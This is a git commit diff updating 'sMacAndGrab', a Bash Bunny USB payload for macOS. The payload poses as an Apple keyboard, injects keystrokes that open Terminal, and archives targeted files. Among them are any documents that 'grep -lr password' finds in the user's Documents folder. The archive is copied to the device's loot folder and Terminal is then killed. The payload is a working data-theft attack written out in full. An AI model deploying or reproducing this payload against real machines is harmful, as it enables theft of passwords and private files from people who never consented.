updates sMacAndGrab for bashbunny fw1.1 (#202)

pull/207/head
Alex Flores 2017-04-26 17:04:38 -10:00 committed by Sebastian Kinne
parent 22cbf92a3b
commit ca9e53c5a8
2 changed files with 5 additions and 10 deletions

View File

@ -3,14 +3,14 @@
# Title: sMacAndGrab # Title: sMacAndGrab
# Author: audibleblink # Author: audibleblink
# Target: macOS # Target: macOS
# Version: 1.1 # Version: 1.2
# #
# Backup a list of files from macOS # Backup a list of files from macOS
# #
# Yellow (blinking)...Attacking # Yellow (blinking)...Attacking
# Green...............Finished # Green...............Finished
LED G R 500 LED ATTACK
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
# make the loot directory on the BashBunny # make the loot directory on the BashBunny
@ -50,16 +50,11 @@ files_to_copy=(
"\$(grep -lr password ~/Documents)" # Escape the subshell to have this run on TARGET "\$(grep -lr password ~/Documents)" # Escape the subshell to have this run on TARGET
) )
QUACK GUI SPACE QUACK RUN OSX terminal
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 4000 QUACK DELAY 4000
# the more files in $files to copy, the longer tar will take to compress # the more files in $files to copy, the longer tar will take to compress
# one-liner because we want the move command to wait for tar to finish # one-liner because we want the move command to wait for tar to finish
QUACK STRING tar -cf \$USER.tar.gz ${files_to_copy[*]}\; mv \$USER.tar.gz $lootdir\; killall Terminal QUACK STRING tar -cf \$USER.tar.gz ${files_to_copy[*]}\; mv \$USER.tar.gz $lootdir\; killall Terminal
QUACK ENTER QUACK ENTER
# sync the filesystem LED FINISH
sync
LED G

View File

@ -1,7 +1,7 @@
# sMacAndGrab # sMacAndGrab
Author: audibleblink Author: audibleblink
Version: Version 1.1 Version: Version 1.2
Target: macOS Target: macOS
## Description ## Description